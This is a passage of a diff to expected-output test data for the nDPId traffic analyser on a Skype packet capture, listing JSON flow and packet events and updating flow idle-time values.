-01768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431969649865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431969649865,"pkt":"0NQSxnP1PBXCt3IOCABFAAPu\/qxAAEAGX8TAqAEibKCqLsElAbuoJs3QuGHot4AYEACQpAAAAQEICj4iqE9henRtFwMBACCGlFiiXnGNbnUA8eFNVg97y26hgjzRrXr8V0YtIj6nMBcDAQOQKBOjiVJxpWdYeLLT\/Xbro3HQPBzjJPC4nFo8EDiP\/qwXTbKKHYw0zh5BjL36gX1CXDX+RahFJG73NIEjJWIM604+RslBUiVdP7BtOTwH9Na9fDbxf2Np60NBtc7IDn0njVPn\/OQFpDztHwH7ReKVzxI3mekCkJeQu5frlXMtzYs\/A6\/788RG\/9eQL\/SpUlGx+OzCYIvqD3TfRfjbcI0rUIMK13b81m\/QfwBa7fmPZMBLpKLV+owE6zVvsZhb2YounO4vXImcKbLXc+pHduRZUFgR7JTndx4BwWKNOeOJb0lOXmVFpPD2t5ChyQpB8B7yAVMimVYrMkRjOI+yOmuEWzpBBb71HAu2RXfIAr1ik+\/qd4k78SdOCRVzA9X9FlfHQtMw2+\/RMHqj5tfPuEb1dJqljOBer+yTyAiFyXzsxxDLI9ugRcdcvYukWjNLVzxsQTVIpyochPhHmfXZ5n\/eZ4dJphlsEijiHWw2q71oBZmMc5GGD6vO7ZjLO3AJWFPWmwoscaJzsLs58ocuQ2qdcOCA7GGVHN\/ijVl75hciIPcfOvLZ6urcFhUq1WWuqtEbVnfmbri38YkIXbc7ejHLENq2QCqsgj5enMQz75I2\/pet\/YCSsRs1eqVYMNg8xjXCKqSJQl62\/bTcGsNwyoxippOcJq8VpG7H7Fvy+AXb68gGTkeGTRQKqtF74u9vbasRDNwPq8\/DPKRvzqNHk914l9uHQ2AKRiwOC\/bnlDR9ocQFekQhsprf\/xDrXO7tscQNAKBRL+tD76zQwjIPz3PJEHN3Pc+QE5WHu5rFSvvxfz\/Z2\/HSf2Um2ZE3koBnXh0ea61MNA9NADFAPSD8Z5NIyJgusH5hoNWKXVoIkzU5GHgbwG14JuajpHBJlMNEXsfmLLVK9oYSSz6nK+qKkyM3mC7X8XBCMQsh\/0ouHgH6HndraUIKsjtp3JPkKjI4aYdJ0qIoz0PG\/x3wOUA4h1YDaa67wXVn4YAKaKBMtrlL40SzVa5Z91cUYV13ZvBCGjlszRtWPZdtD1L\/SaFfIp1tQJKNS\/3Rzkx+IjbAX1llTBgWy3mJMF73JAKDegzbMvdSvKJ6AUv810GsIeQ99gKRkiy\/yhCs7P73CjnzDITEbSmsOsmYIQAoX97vBTFy0OqF392JfqJYzpguRdJo39kQQV95yc415TouOPz9jkaLSSogaYBmY8ija5cax3+df915"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7560000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431969649862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1431969649862,"pkt":"PBXCt3IO0NQSxnP1CABFAAFJCUdAADQGY89soKouwKgBIgG7wSW4YeeiqCbN0IAYAEgh+QAAAQEICmF6dG0+IfU9FwMBARD7Uh6I13FzmcC+6gIV5n6AJhrBsHNwxcug1X4hBQozb5rifdWfxFgx5N7\/STRCna2lXcJzFlsdHwFqwb5pWB6kc7KLSFtZJ1+xqs\/LWpjXKXVYWA3FemYFVDyRXOngCpgT23pGW6q+fdoixXKwG46vp4NCAhC8D9JiN3KitsOr260NevBFtGudn3qUJfX\/3DhGLatA0j+U2CwrLM6DTOg9xpgfiq+azd0+zhMP0HAm0WOjBrmnGfTNcgHh+iJmkjL5sJ7TuSOU5HIOWUg6nL2f38I4\/Fmt1UsWozkMatK9FYjzbVIEXXgeh7hu8fTbVAUDu9Avc4N0XIcK0QG830wTIghFDiessVKi+sWFRr4k9g=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431969649862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969649862,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05cZAAEAGfGTAqAEibKCqLsElAbuoJs3QuGHot4AQD\/f34wAAAQEICj4iqE1henRt"} +01768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431969649865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"thread_ts_msec":1431969649865,"pkt":"0NQSxnP1PBXCt3IOCABFAAPu\/qxAAEAGX8TAqAEibKCqLsElAbuoJs3QuGHot4AYEACQpAAAAQEICj4iqE9henRtFwMBACCGlFiiXnGNbnUA8eFNVg97y26hgjzRrXr8V0YtIj6nMBcDAQOQKBOjiVJxpWdYeLLT\/Xbro3HQPBzjJPC4nFo8EDiP\/qwXTbKKHYw0zh5BjL36gX1CXDX+RahFJG73NIEjJWIM604+RslBUiVdP7BtOTwH9Na9fDbxf2Np60NBtc7IDn0njVPn\/OQFpDztHwH7ReKVzxI3mekCkJeQu5frlXMtzYs\/A6\/788RG\/9eQL\/SpUlGx+OzCYIvqD3TfRfjbcI0rUIMK13b81m\/QfwBa7fmPZMBLpKLV+owE6zVvsZhb2YounO4vXImcKbLXc+pHduRZUFgR7JTndx4BwWKNOeOJb0lOXmVFpPD2t5ChyQpB8B7yAVMimVYrMkRjOI+yOmuEWzpBBb71HAu2RXfIAr1ik+\/qd4k78SdOCRVzA9X9FlfHQtMw2+\/RMHqj5tfPuEb1dJqljOBer+yTyAiFyXzsxxDLI9ugRcdcvYukWjNLVzxsQTVIpyochPhHmfXZ5n\/eZ4dJphlsEijiHWw2q71oBZmMc5GGD6vO7ZjLO3AJWFPWmwoscaJzsLs58ocuQ2qdcOCA7GGVHN\/ijVl75hciIPcfOvLZ6urcFhUq1WWuqtEbVnfmbri38YkIXbc7ejHLENq2QCqsgj5enMQz75I2\/pet\/YCSsRs1eqVYMNg8xjXCKqSJQl62\/bTcGsNwyoxippOcJq8VpG7H7Fvy+AXb68gGTkeGTRQKqtF74u9vbasRDNwPq8\/DPKRvzqNHk914l9uHQ2AKRiwOC\/bnlDR9ocQFekQhsprf\/xDrXO7tscQNAKBRL+tD76zQwjIPz3PJEHN3Pc+QE5WHu5rFSvvxfz\/Z2\/HSf2Um2ZE3koBnXh0ea61MNA9NADFAPSD8Z5NIyJgusH5hoNWKXVoIkzU5GHgbwG14JuajpHBJlMNEXsfmLLVK9oYSSz6nK+qKkyM3mC7X8XBCMQsh\/0ouHgH6HndraUIKsjtp3JPkKjI4aYdJ0qIoz0PG\/x3wOUA4h1YDaa67wXVn4YAKaKBMtrlL40SzVa5Z91cUYV13ZvBCGjlszRtWPZdtD1L\/SaFfIp1tQJKNS\/3Rzkx+IjbAX1llTBgWy3mJMF73JAKDegzbMvdSvKJ6AUv810GsIeQ99gKRkiy\/yhCs7P73CjnzDITEbSmsOsmYIQAoX97vBTFy0OqF392JfqJYzpguRdJo39kQQV95yc415TouOPz9jkaLSSogaYBmY8ija5cax3+df915"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431969652367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969652367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qlYAAEARtuTAqAEiQAQXpjLdnFYAKjPsm5AC0vz7eA6m1WQz3XSdSXIE0xPsZ0Mgdb244ufZVMBp9g=="} 00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -188,12 +188,12 @@ 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISJhIAAEARzh3AqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGANAAEAGj4bAqAEinTg0LMNwnGCx3l8+AAAAALAC\/\/8vJgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2l9AAEAGyKzAqAEinTc4qsNxnE+r6BKEAAAAALAC\/\/99aQAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwhRAAEAGlxXAqAEinTeCjMNynGH\/hzWiAAAAALAC\/\/+8tgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGANAAEAGj4bAqAEinTg0LMNwnGCx3l8+AAAAALAC\/\/8vJgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2l9AAEAGyKzAqAEinTc4qsNxnE+r6BKEAAAAALAC\/\/99aQAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50034,"dst_port":40033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwhRAAEAGlxXAqAEinTeCjMNynGH\/hzWiAAAAALAC\/\/+8tgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/NlsAAEARxRrAqAEib91NkTLdnFsAK6mBm7oCyq7Iy7cmxwvThWDRoZOMl0+28C1BuPbRnMjSw2j4JUc="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -209,14 +209,14 @@ 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5GS4AAEAR4kXAqAEib91NmTLdnFgAJQIPm8ICkS16B313b791pcC\/iQ60uf4KWNmYdYf5eCQ="} 00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1431969657498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657498,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIpxhw3JnDsNv\/4c1o6ASOJAm+AAAAgQFrAQCCApOvfTqPiLFlwEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1431969657498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z75AAEAGiXfAqAEinTeCjMNynGH\/hzWjZw7DcIAQECx9oAAAAQEICj4ixhlOvfTq"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1431969657511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657511,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIpxPw3E+7utRq+gShaASOJAwmQAAAgQFrAQCCApNea1+PiLFlwEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1431969657511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657511,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wcBAAEAG4VfAqAEinTc4qsNxnE+r6BKFPu7rUoAQECyHNAAAAQEICj4ixiZNea1+"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1431969657579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657579,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxgw3AfJGVIsd5fP6ASOJAHOgAAAgQFrAQCCApMZC+DPiLFlwEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1431969657579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657579,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04EdAAEAGx03AqAEinTg0LMNwnGCx3l8\/HyRlSYAQECxdkgAAAQEICj4ixmlMZC+D"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 